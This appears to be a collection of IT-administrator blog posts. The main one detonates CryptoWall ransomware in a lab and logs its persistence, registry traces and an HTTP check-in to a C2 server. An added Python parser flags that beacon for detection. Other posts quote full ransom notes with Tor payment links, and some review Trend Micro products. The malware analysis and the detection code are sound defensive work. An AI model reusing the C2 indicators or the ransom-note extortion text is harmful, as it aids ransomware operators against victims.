Infecting myself with Ransomware (Exploring CryptoWall)

What, am I crazy?

No, I have a lab setup with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt, Wireshark for packet sniffing and Sysinternals Process Monitor.

So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc.) this is harder than I thought. I also had to dumb down my SonicWall firewall to let viruses through. The antivirus companies have been taking down the virus URLs faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.

So I had to bypass the built-in Internet Explorer protection (it also wanted to kill my download) and finally I have Document-128_712.zip. I extracted the contents: Document-128_712.scr with a PDF icon. I double-click the screensaver file (an executable in disguise) and the file vanishes. The mouse changes to an hourglass for a second and then nothing. I refer to Wireshark and Process Monitor. They are blitzing past, recording data.

There is nothing at the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double click it again and again as nothing appears to happen.

As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive subfolders and then I create a folder called “a”, as in C:\a. It is safe, as the process does not seem to double back once it has passed a letter of the alphabet. A nice place to save logs etc. So, here come the screenshots. Some are from this current experiment, some from an actual infection.

(Screenshot: PDF file)

So here is the .scr file, renamed to bd99547.exe. It is the same file as Document-128_712.scr, as the hashes are the same. It is in the Startup group, so if you restart your PC, it continues to encrypt.

(Screenshot: startup)

Now showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.

(Screenshot: hidden folder on C:\)

So I let this thing continue on and do its job. The exe file located in the Start Menu Startup group and on C:\ will vanish later. I watch as Process Monitor shows me the “exe” file I ran using Windows' built-in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft has already provided everything it needs. It is using Microsoft's own tools to hold us to ransom.

I watch it connect to 199.127.225.232 and do an HTTP POST. This server is called babyslutsnil.com.

POST /da2c5yzx438 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 100
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Host: babyslutsnil.com
Cache-Control: no-cache

z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16

HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Length: 778
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
Pragma: no-cache
Connection: close

<html>
<head>
<title>500 Internal Privoxy Error</title>
<link rel="shortcut icon" href="http://config.privoxy.org/error-favicon.ico" type="image/x-icon"></head>
<body>
<h1>500 Internal Privoxy Error</h1>
<p>Privoxy encountered an error while processing your request:</p>
<p><b>Could not load template file <code>forwarding-failed</code> or one of its included components.</b></p>
<p>Please contact your proxy administrator.</p>
<p>If you are the proxy administrator, please put the required file(s) in the <code><i>(confdir)</i>/templates</code> directory. The location of the <code><i>(confdir)</i></code> directory is specified in the main Privoxy <code>config</code> file. (It's typically the Privoxy install directory, or <code>/etc/privoxy/</code>).</p>
</body>
</html>

I can only assume it is trying to send out the RSA encryption key to the remote server.
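As an added example (not code from the post), here is a small Python parser for a capture like the one above: it separates the check-in request from the proxy response that was fused onto the end of its body, and flags the traits of that beacon so the same shape can be spotted in other captures. The sample capture, its placeholder hex body and the heuristics are assumptions modelled on the capture, not vendor signatures. Note that the 500 here is the lab's own Privoxy "forwarding-failed" page, so this particular POST never reached the remote server.

```python
import re
from urllib.parse import parse_qs

# Constructed sample modelled on the capture in the post: the proxy's 500
# response is fused straight onto the end of the 100-byte POST body.
# The hex value is a placeholder, not the real beacon payload.
SAMPLE_CAPTURE = (
    "POST /da2c5yzx438 HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: Close\r\n"
    "Content-Length: 100\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)\r\n"
    "Host: babyslutsnil.com\r\n\r\n"
    "z=" + "0123456789abcdef" * 6 + "01"
    + "HTTP/1.1 500 Internal Privoxy Error\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n\r\n<html>...</html>"
)

def parse_capture(raw: str) -> dict:
    """Split the request from a response that may be glued onto its body.
    Returns path, lower-cased headers, body and the response status/reason
    (status is None when no response was captured)."""
    resp = re.search(r"HTTP/1\.[01] (\d{3}) ([^\r\n]*)", raw)
    request = raw[:resp.start()] if resp else raw
    head, _, body = request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"path": lines[0].split(" ")[1], "headers": headers, "body": body,
            "status": int(resp.group(1)) if resp else None,
            "reason": resp.group(2) if resp else ""}

def looks_like_checkin(x: dict) -> bool:
    """Traits of the captured beacon: a short random-looking path, a body that
    is one form field of pure hex, an old MSIE user agent, Connection: Close."""
    params = parse_qs(x["body"])
    hex_only = len(params) == 1 and all(
        re.fullmatch(r"[0-9a-f]{32,}", v[0]) for v in params.values())
    random_path = re.fullmatch(r"/[a-z0-9]{8,16}", x["path"]) is not None
    old_msie = "MSIE 7.0" in x["headers"].get("user-agent", "")
    closes = x["headers"].get("connection", "").lower() == "close"
    return hex_only and random_path and old_msie and closes

def blocked_by_proxy(x: dict) -> bool:
    """Privoxy's 'forwarding-failed' page is generated by the proxy itself, so
    a 500 naming Privoxy means the beacon never reached the Host server."""
    return x["status"] == 500 and "Privoxy" in x["reason"]
```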

Then you start seeing the encrypted files in folders with additional files (DECRYPT_INSTRUCTION).

(Screenshot: decrypt files)

Then you find a key in the registry which starts off the same as the exe file name.

(Screenshot: registry)

and then the exes start to vanish and are replaced with the warnings you will see at the next reboot.

(Screenshot: startup1)

Then you get invited to go up, pay some money, download another exe file (do you trust it?) with the decryption, and away you go!

(Screenshot: pay)

It uses the TOR network for the website, so there is no way to track these guys. They are anonymous and invisible.

Now the trick is to get these files and screen shots from “C:\a” onto my USB key, as when I plug it in, the files get encrypted.

Final step: FORMAT THE MACHINE. My packet sniffs and process monitoring have shown me that this malware gets all over your PC.

Don’t fix it, reformat it. You can recover files from Backups or Volume Shadow copy but the underlying OS is now owned by some remote hacker. Don’t dice with death!

Moral: Have offline, current backups!


CryptoWall

Oh dear, just had someone contact us who has CryptoWall. All their work files are encrypted.

Looks like a staff member opened an attachment through Hotmail.
This Symantec link alludes to a new variant: http://www.symantec.com/security_response/writeup.jsp?docid=2014-061923-2824-99

This particular infection looks different to the previous ones. Still digging through it to figure out what the deal is. We have recovered 99% of their data from backups and Volume Shadow Copy.

Here's the file placed in various folders on their server:

BD995470B3904425B4FEAE109E797A49

What happened to your files ?
All of your files were protected by a strong encryption with RSA-2048 using CryptoWall.
More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

What does this mean ?
This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,
it is the same thing as losing them forever, but with our help, you can restore them.

How did this happen ?
Especially for you, on our server was generated the secret key pair RSA-2048 – public and private.
All your files were encrypted with the public key, which has been transferred to your computer via the Internet.
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

What do I do ?
Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.
If you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.
For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:
1. https://kpai7ycr7jxqkilp.enter2tor.com/9R08
2. https://kpai7ycr7jxqkilp.tor2web.org/9R08
3. https://kpai7ycr7jxqkilp.onion.to/9R08

If for some reasons the addresses are not available, follow these steps:
1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2. After a successful installation, run the browser and wait for initialization.
3. Type in the address bar: kpai7ycr7jxqkilp.onion/9R08
4. Follow the instructions on the site.

IMPORTANT INFORMATION:
Your personal page: https://kpai7ycr7jxqkilp.enter2tor.com/9R08
Your personal page (using TOR): kpai7ycr7jxqkilp.onion/9R08
Your personal identification number (if you open the site (or TOR ‘s) directly): 9R08


Upgrade to Trend Micro Worry Free 9 causes 10 minute stall when plugging in USB storage

On one of our installations, since installing TMWF9, whenever a USB drive (Hard disk or Flash media) is installed to the Master server, explorer stops responding for 10 minutes.

Remote access for file shares on servers still works. Sharepoint, Exchange and other services are unaffected. It is just the Explorer Windows on the local server console (Which is used for the Browse feature or File explorer /My Computer).

If you open the Disk Management before inserting the drive, you note that a volume comes up, then it all stalls and the disk is not allocated a drive letter for 10 minutes.

From a command prompt, if you try and move to that disk, it stalls. If you try a non-existent disk, it comes back “drive not found”. In this way I know I can navigate using CMD and switch between valid drive letters, just not this new volume. It seems the drive has started allocating resources but it is not yet available for use.

If during this time you try and stop the Trend Agent – real-time scan service, it hangs whilst stopping until the 10 minutes is up.

If we halt that service first, USB drives go in and out as normal. If we do not halt it or it restarts, when inserting a drive, Explorer hangs again for 10 minutes.

After 10 minutes, the drive volume appears, Explorer responds and everything goes back to normal.

There are no events recorded in the EventLog :(


Cryptolocker (Again, new and improved ?)

UPDATE: Be sure to read the comments to this post. I am posting new information and updates as comments. There is a lot of information there.

Yes, again we see Cryptolocker. My client emailed me the following: “I received an email on Friday from Energy Australia that took me to a website and it asked me to run a program but I could not open anything I believe that email may have caused this issue if that is of any help”

This falls in line with other people's observations, i.e. http://blogs.appriver.com/Blog/bid/102814/New-CryptoLocker-Has-a-Walkabout

We have not yet worked out how this version works nor what files have been affected. Here is the text:

!!! YOUR SYSTEM IS HACKED !!!

All your files was encrypted with Cryptolocker!

This means that without the decryption key the recovery of your files is not possible, If your files have a value to you and you are willing to pay me for the decryption key please contact me: decrypt-request@mail.ua

You have 3 days to pay for my services. After this period, you will lose all your files.

Anti-virus software can remove Cryptolocker, but can not decrypt your fles. The only way to recover your files -is to pay for the decryption key.

Information for IT-specialist:

Data was encrypted with AES (Rijndael) algorithm with the session key length if 256 bits. Session key is encrypted with RSA (2048 bits) algorithm. Public-key is enclosed into Cryptolocker. Private-key for decryption of the session key is stored only in my database. To crack this key, you will need more than a million years time.

Here is a photo:
(Photo: Img_0804ed2)

This is the nasty email that began it all:

(Screenshot: email)


Real world test of Trend Worry Free Professional

I miss Microsoft ISA/TMG. I miss being able to report on staff's internet usage, solve bottlenecks, isolate PCs that have downloaded malware, and all the other general IT admin things that go with this.
Along comes Trend Worry Free Professional, which allows you to set up your browser to use the external proxy in Trend Micro's Amazon cloud.

You can set up LDAP integration with your AD and then, after the staff have used it, do reports on their activity.

This all sounds really nice.

So what are the real world issues with this product?

  • Using it from South Australia and using Proxy servers on the eastern side of Australia, my latency is huge. It adds 30 ms. A slow ADSL2+ connection feels this badly. All my pages are delayed and slow coming up. The experience over fibre or in the eastern states is far less exaggerated.
  • I keep getting certificate popups. I get it for my email (especially using Office 365), I get it for many of the HTTPS sites I use.
  • The proxy settings are easy to tamper with. Unless you lock IE settings down or force the settings via Group policy, users can bypass the proxy.
  • I have a few websites that “sometimes work”. One happens to be my webmail. The experience is very hit and miss with the proxy turned on.
  • The built in reports are very basic. They don’t give me enough detail.

Ok, this all sounds really bad. Yes, there are some teething issues and the latency is killing me, so why do I love this product?

  • It filters all my outbound web traffic and removes Malware and viruses instantly as discovered.
  • I can dump the raw logs into Excel and do my own reports.
  • I can have external roaming users logged into this no matter where they are in the world.
  • I have control of what happens on the network.

So if you have Fibre, are in the eastern states or have a client with very little expectations (maybe they are not a big internet user) then this is an awesome tool.

If you are a geek like me, you have to work out whether the tool makes your habits safer and live with it, or, if the speed annoys you, forge ahead and run other protection.

Don’t forget, this is only version 1, future advancements will help.


Trend Micro Worry Free 9 attachment blocking

We have just upgraded a client to TMWF9 (another one in a long list of clients to upgrade). In the product's previous configuration, attachment blocking was turned on.
Exceptions were set to allow most Microsoft Office documents in. This included Word Doc and Docx format.

After the upgrade, the attachment policy is still the same. The Doc and Docx files are allowed through; however, they are not getting through.

They are being replaced with the text file saying that the attachment was removed due to policy.

We have tried turning the Attachment blocking on / off and turning the exception for Word on and off.

We have a case open with Trend. The only work around presently is to disable attachment blocking.

NOTE: Be aware. If Attachment blocking is on, Scanmail stomps around in your email store removing all attachments that match. Even if the attachments were placed into your mailbox years ago. It is not just an attachment blocker but also a remover of existing attachments. Don’t play with attachment blocking until you understand this.
